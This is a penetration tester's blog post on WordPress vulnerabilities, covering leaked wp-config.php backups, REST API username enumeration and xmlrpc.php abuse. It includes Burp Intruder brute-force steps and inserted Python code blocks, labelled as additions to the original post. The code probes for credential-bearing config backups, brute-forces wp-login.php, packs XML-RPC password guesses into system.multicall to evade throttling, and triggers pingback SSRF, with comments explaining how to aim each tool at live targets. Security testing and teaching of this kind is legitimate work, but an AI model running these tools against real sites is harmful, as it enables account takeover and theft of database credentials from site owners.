Common Vulnerabilities in Wordpress Sites
Hello everyone, I'm Sriharan Mahendran, an independent Penetration Tester and Security Researcher. Throughout my career, I've successfully secured numerous company websites against cyber threats. Today marks the first blog of my cybersecurity journey, where I aim to share insights and experiences with you.
In this blog I will try to cover some of the common WordPress misconfigurations and vulnerabilities that I know of.
! Let's begin hacking WordPress !
→ What Is WordPress?
WordPress is a free and open-source content management system that lets anyone create and manage websites easily. Starting as a blogging platform, the WordPress software has evolved to help users build various sites, from blogs and portfolios to eCommerce stores.
→ Why Use WordPress?
With so many website builders on the market, you may wonder what makes WordPress different. Here’s why millions of site owners use WordPress:
Easy to Use
With WordPress, users can create their own website without code. The admin panel is intuitive, letting you easily manage content, media, appearance, and plugins.
→ How Does WordPress Work?
WordPress is a PHP application backed by a MySQL/MariaDB database. Posts, pages, comments, user accounts and settings live in the database; the core code, themes, plugins and uploaded media live as files under the web root. Both halves matter for security: the database credentials sit in wp-config.php on the filesystem, and every installed plugin or theme is PHP that runs with the same privileges as WordPress itself.
→ Detecting WordPress :
The quickest way is the Wappalyzer browser extension (available for Chrome and Firefox). Wappalyzer identifies the technologies a website is built with, such as its CMS, frameworks and server software. The vendor also sells lists of websites using a given technology, with company and contact details, for lead generation, market analysis and competitor research.
Manual fingerprinting works without any extension: look for a <meta name="generator" content="WordPress x.y.z"> tag, assets loaded from /wp-content/ and /wp-includes/, a Link header pointing at /wp-json/ with rel="https://api.w.org/", an X-Pingback header naming xmlrpc.php, and the /wp-login.php, /wp-admin/ and /readme.html paths.
After confirming that the site runs WordPress, we can test it with manual analysis and automated vulnerability scanners.
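The manual fingerprinting above, as an added example that is not part of the original post: a small Python routine that inspects one HTTP response (body plus headers) for the markers WordPress leaves by default and pulls the version from the generator tag or the ?ver= query on core assets. The sample response and the example.test host name are constructed for the demonstration.

```python
"""Manual WordPress fingerprinting from a single HTTP response.
Added example, not code from the original post; SAMPLE_HTML and
SAMPLE_HEADERS are constructed to stand in for a real response."""
import re

# Markers a stock WordPress install emits in its HTML and headers.
_GENERATOR = re.compile(
    r'<meta\s+name="generator"\s+content="WordPress(?:\s+([\d.]+))?"', re.I)
_ASSET_PATHS = re.compile(r"/wp-(?:content|includes)/", re.I)
# ?ver= on /wp-includes/ assets is the core version (plugin assets carry their own).
_CORE_VER = re.compile(r"/wp-includes/[^\"'\s]*?[?&]ver=([\d.]+)", re.I)
_REST_LINK = re.compile(r'rel="https://api\.w\.org/"', re.I)


def fingerprint(html, headers):
    """Return {'wordpress': bool, 'version': str|None, 'indicators': [...]}.
    headers is a list of (name, value) pairs as urllib/requests expose them."""
    indicators, version = [], None
    m = _GENERATOR.search(html)
    if m:
        indicators.append("meta generator")
        version = m.group(1)
    if _ASSET_PATHS.search(html):
        indicators.append("wp-content/wp-includes asset paths")
    vq = _CORE_VER.search(html)
    if vq and version is None:
        version = vq.group(1)
    if _REST_LINK.search(html):
        indicators.append("REST discovery link in HTML")
    for name, value in headers:
        if name.lower() == "link" and "api.w.org" in value:
            indicators.append("REST discovery Link header")
        if name.lower() == "x-pingback":
            indicators.append("X-Pingback header (xmlrpc.php advertised)")
    return {"wordpress": bool(indicators), "version": version,
            "indicators": indicators}


# Constructed sample response for an offline run.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 6.4.3" />
<link rel="https://api.w.org/" href="https://example.test/wp-json/" />
<link rel="stylesheet" href="https://example.test/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3" />
<script src="https://example.test/wp-content/themes/twentytwentyfour/assets/app.js"></script>
</head><body></body></html>"""
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Link", '<https://example.test/wp-json/>; rel="https://api.w.org/"'),
    ("X-Pingback", "https://example.test/xmlrpc.php"),
]

if __name__ == "__main__":
    # Swap SAMPLE_* for the body/headers of a live GET to test a real target.
    print(fingerprint(SAMPLE_HTML, SAMPLE_HEADERS))
```

A site that strips the generator tag and hides the Link header still tends to reference /wp-includes/ assets, so check for all indicators rather than any single one before trusting a negative result.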
Vulnerability 1 : Severity High [ Configuration File Leakage ] :
wp-config.php holds the database name, user, password and host, the table prefix and the authentication keys and salts. Anyone who can read it can usually connect to the database directly (if it is reachable) or forge authentication cookies, so exposure of this file on a production server is a critical issue.
A request for wp-config.php itself is executed by PHP and returns an empty page. The problem is the copies that editors, deployment scripts and manual backups leave next to it under other names: the web server does not treat those as PHP and serves them as plain text or as a downloadable archive. Requesting the file under such alternative names is a common technique for attackers, and leaving them behind is a common oversight by developers.
For example:
/wp-config.md
/wp-config.zip
/wp-config.txt
/wp-config.php.bak
/wp-config.php_orig
/wp-config.bak
/wp-config.php~
/wp-config.php.save
/wp-config.old
An automated scan can be done with WPScan (its config-backup enumeration, --enumerate cb, tries a similar list) and other automation tools. Whatever tool you use, judge hits by content and not by status code alone: many sites answer 200 with a "not found" page for every path.
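The backup-name probing described above, as an added example that is not part of the original post: Python code that builds the candidate URLs from a base name and suffix list, fetches each one, and classifies the answer by what it contains (a define('DB_...') line or an archive signature) rather than by a bare 200, which is what defeats soft-404 pages. The fetch callable is pluggable so the constructed sample site below runs offline; example.test and the sample bodies are assumptions.

```python
"""Probe for readable wp-config.php backup copies.
Added example, not code from the original post; example.test, the
sample responses and sample_fetch() are constructed for the demo."""
import re
import urllib.error
import urllib.request

BASENAMES = ["wp-config.php", "wp-config"]
SUFFIXES = [".bak", ".old", ".orig", "_orig", ".save", ".swp", "~",
            ".txt", ".md", ".zip", ".tar.gz", ".copy", ".dist"]

# Text that only a real wp-config.php source contains.
_LEAK = [re.compile(p) for p in (
    r"define\(\s*['\"]DB_(?:NAME|USER|PASSWORD|HOST)['\"]",
    r"\$table_prefix\s*=",
    r"define\(\s*['\"]AUTH_KEY['\"]",
)]


def candidate_paths(base_url):
    base = base_url.rstrip("/")
    return [f"{base}/{name}{suffix}" for name in BASENAMES for suffix in SUFFIXES]


def classify(status, body):
    """'leak' | 'archive' | 'none'. A bare 200 proves nothing: soft-404 sites
    answer 200 to every path, and wp-config.php itself is executed by PHP and
    comes back empty. Archives cannot be grepped, so flag them for download."""
    if status != 200 or not body:
        return "none"
    if body[:4] == b"PK\x03\x04" or body[:2] == b"\x1f\x8b":   # zip / gzip magic
        return "archive"
    text = body.decode("utf-8", "replace")
    return "leak" if any(p.search(text) for p in _LEAK) else "none"


def http_fetch(url, timeout=10):
    """(status, first 200 KB of body); non-2xx answers are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "wp-config-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(200_000)
    except urllib.error.HTTPError as err:
        return err.code, err.read(200_000)


def probe(base_url, fetch=http_fetch):
    """Return {url: verdict} for every path that looks like a real leak."""
    hits = {}
    for url in candidate_paths(base_url):
        try:
            status, body = fetch(url)
        except OSError:
            continue          # timeouts, DNS failures: skip and keep going
        verdict = classify(status, body)
        if verdict != "none":
            hits[url] = verdict
    return hits


# Constructed responses for a site that left two backup copies readable
# and answers 200 with an HTML page for everything else (soft 404).
_SAMPLE_SITE = {
    "https://example.test/wp-config.php.bak":
        b"<?php\ndefine( 'DB_NAME', 'wp_prod' );\ndefine( 'DB_PASSWORD', 'hunter2' );\n",
    "https://example.test/wp-config.zip": b"PK\x03\x04\x14\x00\x00\x00",
}


def sample_fetch(url):
    return 200, _SAMPLE_SITE.get(url, b"<html><body>Page not found</body></html>")


if __name__ == "__main__":
    # Replace sample_fetch with http_fetch (the default) to probe a live target.
    print(probe("https://example.test", sample_fetch))
```

The soft-404 case is the one that burns people in practice: without the content check, every one of the thirty-odd candidate names would report as a finding on the sample site.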
Vulnerability 2 : Severity medium : Admin username enumeration via REST API
The WordPress REST API discloses the account of every user who has published a public post. GET /wp-json/wp/v2/users (or /?rest_route=/wp/v2/users on sites without pretty permalinks) returns each author's id, display name and slug, and the slug is normally derived from the login name. Requesting /?author=1 and reading the redirect to /author/<slug>/ gives the same information for sequential user IDs. On its own this is classified as P4 under Bugcrowd's Vulnerability Rating Taxonomy (VRT), Enumeration -> Usernames -> Non-Bruteforce,
but the severity rises to P1 or P2 when the enumerated username feeds a successful password attack, using the following steps:
- Open your target WordPress site in your BurpSuite-configured browser.
- Append /wp-login.php to the target website's URL. This takes you to the WordPress login page.
- Enter the enumerated username with any random password (e.g., admin:admin) and capture that request with BurpSuite's proxy. Make sure you intercept the request before it is sent to the server.
- Once you've captured the request, send it to Intruder by right-clicking on the request and selecting "Send to Intruder".
- In the Intruder tab, open the "Positions" sub-tab. Clear all positions, leave the log parameter set to the enumerated username, and mark only the value of the pwd parameter as the payload position (pwd=§admin§). This tells Intruder to replace the password with each payload during the attack.
- Switch to the "Payloads" tab and load your wordlist of candidate passwords.
- Once the wordlist is loaded, click "Start attack". BurpSuite iterates through the wordlist, sending a login request with each password for the chosen username.
- Monitor the attack progress in the Intruder tab. A wrong password returns 200 with the login form and a "login_error" message; the correct one returns a 302 redirect to /wp-admin/ and sets a wordpress_logged_in_ cookie, so sort the results by status code or response length to spot it. Expect a login-lockout plugin or WAF to throttle or block this on hardened sites, and keep the wordlist small and targeted.
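The same two-stage flow (enumerate users through the REST API, then check passwords against wp-login.php) as an added example that is not part of the original post, in Python rather than Burp Intruder. It shows the two details the Intruder walk-through hides: the wordpress_test_cookie that wp-login.php requires before it will even evaluate a password, and recognising success from the 302 plus wordpress_logged_in_ cookie instead of following the redirect. example.test, the users listing and sample_post() are constructed.

```python
"""REST user enumeration followed by password checks against wp-login.php.
Added example, not code from the original post; example.test, the sample
users listing and sample_post() are constructed for an offline run."""
import json
import re
import urllib.error
import urllib.parse
import urllib.request


def rest_user_urls(base_url):
    """Both spellings of the users endpoint; the second works without pretty permalinks."""
    base = base_url.rstrip("/")
    return [f"{base}/wp-json/wp/v2/users?per_page=100",
            f"{base}/?rest_route=/wp/v2/users&per_page=100"]


def extract_usernames(rest_json):
    """'slug' is the user_nicename, which WordPress derives from the login name
    (sanitised, e.g. 'j.doe' -> 'j-doe') unless the user changed it; 'name' is
    only the display name."""
    return [{"id": u.get("id"), "slug": u.get("slug"), "name": u.get("name")}
            for u in json.loads(rest_json)]


def author_slug_from_redirect(location):
    """/?author=N redirects to /author/<slug>/ when the ID exists."""
    m = re.search(r"/author/([^/?#]+)", location or "")
    return m.group(1) if m else None


def login_succeeded(status, headers):
    """A correct password gives a 302 to wp-admin plus a wordpress_logged_in_*
    cookie; a wrong one re-renders the form with 200 and a #login_error div."""
    for name, value in headers:
        if name.lower() == "set-cookie" and "wordpress_logged_in_" in value:
            return True
    return status in (301, 302) and any(
        name.lower() == "location" and "/wp-admin" in value for name, value in headers)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None   # surface the 302 as an HTTPError instead of following it


def wp_login_post(base_url, username, password, timeout=10):
    """One POST to wp-login.php -> (status, headers). The test cookie is
    mandatory: without it WordPress answers 'Cookies are blocked' for every
    password and the attack silently never succeeds."""
    base = base_url.rstrip("/")
    data = urllib.parse.urlencode({
        "log": username, "pwd": password, "wp-submit": "Log In",
        "redirect_to": f"{base}/wp-admin/", "testcookie": "1"}).encode()
    req = urllib.request.Request(f"{base}/wp-login.php", data=data, headers={
        "Cookie": "wordpress_test_cookie=WP%20Cookie%20check",
        "Content-Type": "application/x-www-form-urlencoded"})
    try:
        with urllib.request.build_opener(_NoRedirect).open(req, timeout=timeout) as r:
            return r.status, list(r.headers.items())
    except urllib.error.HTTPError as err:
        return err.code, list(err.headers.items())


def try_logins(post, username, passwords):
    """post(username, password) -> (status, headers). Returns the first password
    that logs in, or None."""
    for pw in passwords:
        status, headers = post(username, pw)
        if login_succeeded(status, headers):
            return pw
    return None


# Constructed /wp-json/wp/v2/users output and a login that accepts one password.
SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin",
     "link": "https://example.test/author/admin/"},
    {"id": 3, "name": "Editor", "slug": "j-doe",
     "link": "https://example.test/author/j-doe/"},
])


def sample_post(username, password):
    if username == "admin" and password == "Winter2024!":
        return 302, [("Location", "https://example.test/wp-admin/"),
                     ("Set-Cookie", "wordpress_logged_in_3f1=admin%7C...; path=/")]
    return 200, [("Content-Type", "text/html; charset=UTF-8")]


if __name__ == "__main__":
    # For a live target: post = lambda u, p: wp_login_post("https://example.test", u, p)
    for user in extract_usernames(SAMPLE_USERS_JSON):
        print(user["slug"], try_logins(sample_post, user["slug"],
                                       ["admin", "password", "Winter2024!"]))
```

Because the slug is the sanitised nicename rather than the raw login, a slug such as j-doe may correspond to a login of j.doe or j_doe; try the obvious variants before concluding that an account is not brute-forceable.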
Vulnerability 3 : Severity low to high : xmlrpc.php
XML-RPC, or XML Remote Procedure Call, is an API (application programming interface) exposed by WordPress at /xmlrpc.php. It lets developers interact with a WordPress site programmatically, so mobile apps, desktop apps and other services can communicate with the site. It predates the REST API and is still enabled by default.
The XML-RPC API provided by WordPress offers developers the ability to perform various tasks that would otherwise require manual interaction through the web interface.
These tasks include:
Publishing a post
Editing a post
Deleting a post
Uploading a new file (such as an image for a post)
Retrieving a list of comments
Editing comments
Brute-force attack
- Open the endpoint in your browser at
http://<targetWebSite.com>/<wordpress directory>/xmlrpc.php. A plain GET only returns the message "XML-RPC server accepts POST requests only."
- Open your proxy (I am using Burp) and resend the request, changing the GET request to a POST request.
- To list all the methods the site's XML-RPC server exposes, send a POST request with the following body:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Before proceeding with the attack, verify that one of the following credential-taking methods is listed:
wp.getUsersBlogs
wp.getCategories
metaWeblog.getUsersBlogs
There are a few more such methods, but these are the most commonly available and the ones I have dealt with.
- If any of these methods is available, we can proceed with the brute-force login attack using the following POST request structure. A wrong password returns a fault with faultCode 403 and the string "Incorrect username or password."; the right one returns the user's list of blogs. If system.listMethods also shows system.multicall, many wp.getUsersBlogs attempts can be packed into a single HTTP request, which both speeds the attack up and sidesteps per-request login throttling:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
The same endpoint can also expose a higher-severity issue, SSRF, through the pingback.ping method:
- List all the methods and search for pingback.ping.
- If pingback.ping is available, we can make the server issue a request to a host we control and observe it with BurpSuite Collaborator. Here's how:
- Start BurpSuite and configure Burp Collaborator. Go to "Burp" > "Burp Collaborator client" and ensure that the Collaborator client is running.
- In BurpSuite, intercept the POST request to the XML-RPC endpoint and set the method to pingback.ping.
- Modify the request so that the first parameter (sourceURI, the URL WordPress will fetch) is your Collaborator URL and the second (targetURI) is an existing post on the target site that still accepts pingbacks; WordPress validates the target first and only then fetches the source. A DNS or HTTP interaction in Collaborator confirms the server-side request. Recent WordPress versions refuse loopback and private-network addresses in the source URL, so in practice this is usually a blind, outbound-only SSRF (useful for callbacks and for making the site hammer third parties) rather than a route into internal services:
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://YOUR_COLLABORATOR_URL/</string></value>
</param>
<param>
<value><string>http://<targetWebSite.com>/<path-to-an-existing-post>/</string></value>
</param>
</params>
</methodCall>
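The whole xmlrpc.php procedure above (listing methods, the wp.getUsersBlogs credential check, the system.multicall variant and the pingback.ping trigger) as one added example that is not part of the original post. It uses Python's standard xmlrpc.client only to build and parse the XML shown in the hand-written requests, so each message can be inspected before it is sent. The SAMPLES dictionary holds constructed responses shaped like what xmlrpc.php returns, so the block runs offline; example.test and the credentials are placeholders.

```python
"""XML-RPC probes for WordPress: method listing, wp.getUsersBlogs checks
(single and via system.multicall) and a pingback.ping SSRF trigger.
Added example, not code from the original post; SAMPLES, example.test and
the credentials are constructed placeholders."""
import urllib.request
import xmlrpc.client as xc


def build_call(method, *params):
    """Serialise one <methodCall>; the same XML as the hand-written requests above."""
    return xc.dumps(params, methodname=method)


def parse_response(xml_text):
    """Return (ok, value). WordPress answers a bad login with a fault
    (faultCode 403, 'Incorrect username or password.') and a good one with
    an array of blog structs."""
    try:
        params, _ = xc.loads(xml_text)
        return True, (params[0] if params else None)
    except xc.Fault as fault:
        return False, (fault.faultCode, fault.faultString)


def build_multicall_login(username, passwords):
    """Pack many wp.getUsersBlogs attempts into one request via system.multicall.
    Only worthwhile if system.listMethods advertises system.multicall."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]}
             for pw in passwords]
    return xc.dumps((calls,), methodname="system.multicall")


def parse_multicall(xml_text, passwords):
    """Map password -> True/False. A failed sub-call comes back as a struct
    with faultCode; a successful one as a one-element array holding the result."""
    ok, results = parse_response(xml_text)
    if not ok:
        return {}
    return {pw: not (isinstance(r, dict) and "faultCode" in r)
            for pw, r in zip(passwords, results)}


def build_pingback(source_url, target_post_url):
    """pingback.ping(sourceURI, targetURI): WordPress validates targetURI as one
    of its own posts, then fetches sourceURI to check that it links back."""
    return xc.dumps((source_url, target_post_url), methodname="pingback.ping")


def xmlrpc_post(endpoint, xml_body, timeout=15):
    """Send a raw XML-RPC body (xmlrpc.php rejects GET: 'accepts POST requests only')."""
    req = urllib.request.Request(endpoint, data=xml_body.encode(),
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def list_methods(send):
    """send(xml) -> response xml. Returns the advertised method names as a set."""
    ok, methods = parse_response(send(build_call("system.listMethods")))
    return set(methods) if ok else set()


# Constructed responses shaped like real xmlrpc.php answers, for an offline run.
SAMPLES = {
    "methods": xc.dumps((["system.multicall", "system.listMethods",
                          "pingback.ping", "wp.getUsersBlogs"],), methodresponse=True),
    "bad_login": xc.dumps(xc.Fault(403, "Incorrect username or password."),
                          methodresponse=True),
    "good_login": xc.dumps(([{"isAdmin": True, "blogid": "1",
                              "url": "https://example.test/"}],), methodresponse=True),
    "multicall": xc.dumps(([{"faultCode": 403,
                             "faultString": "Incorrect username or password."},
                            [[{"isAdmin": True, "blogid": "1"}]]],), methodresponse=True),
}


def demo(send):
    """Walk the page's procedure against a send() callable and report what applies."""
    methods = list_methods(send)
    report = {"multicall": "system.multicall" in methods,
              "pingback": "pingback.ping" in methods}
    if "wp.getUsersBlogs" in methods:
        ok, _ = parse_response(send(build_call("wp.getUsersBlogs", "admin", "Winter2024!")))
        report["login"] = ok
    return report


if __name__ == "__main__":
    # Canned transport keyed on the method name of the outgoing call; for a live
    # target use: lambda xml: xmlrpc_post("https://example.test/xmlrpc.php", xml)
    canned = {"system.listMethods": SAMPLES["methods"],
              "wp.getUsersBlogs": SAMPLES["good_login"]}
    print(demo(lambda xml: canned[xc.loads(xml)[1]]))
```

When reporting, keep the two findings apart: a multicall-amplified credential check is a brute-force issue whose severity depends on the password policy, while a confirmed pingback.ping callback is a server-side request, rated on what the server can reach.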
Using these vulnerabilities in WordPress I was able to earn some bounties.
You can also contact me / follow me on
LinkedIn → https://www.linkedin.com/in/sriharan-mahendran/
G-Mail → sriharanmahimala125@gmail.com